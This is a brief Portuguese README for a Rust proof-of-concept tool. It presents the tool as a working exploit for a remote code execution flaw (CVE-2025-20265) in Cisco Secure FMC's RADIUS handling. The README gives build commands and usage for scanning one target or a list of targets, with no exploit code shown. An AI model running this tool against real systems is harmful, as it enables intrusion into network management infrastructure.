
PoC para a vulnerabilidade de execução remota de código no RADIUS do software Cisco Secure FMC (CVE-2025-20265)
Este é um exploit funcional para uma vulnerabilidade de 1 dia.
Use por sua conta e risco. Você é responsável por suas ações.
cargo build --release
$ ./target/release/cve_2025_20265 --help
# or
$ cargo run --release -- --help
Para depurar, use a variável de ambiente RUST_LOG:
RUST_LOG=debug cargo run --release -- --help
# use either the build or the path to the executable file
$ alias EXE="cargo run --release"
# or
$ cargo build --release
$ alias EXE="./target/release/cve_2025_20265"
# check the target
$ EXE https://10.10.10.1:4443/
# read targets from the file
$ echo -e "https://10.10.10.1:4443\nhttp://127.0.0.1\nhttp://10.10.10.10" > targets.txt
$ EXE --from-file targets.txt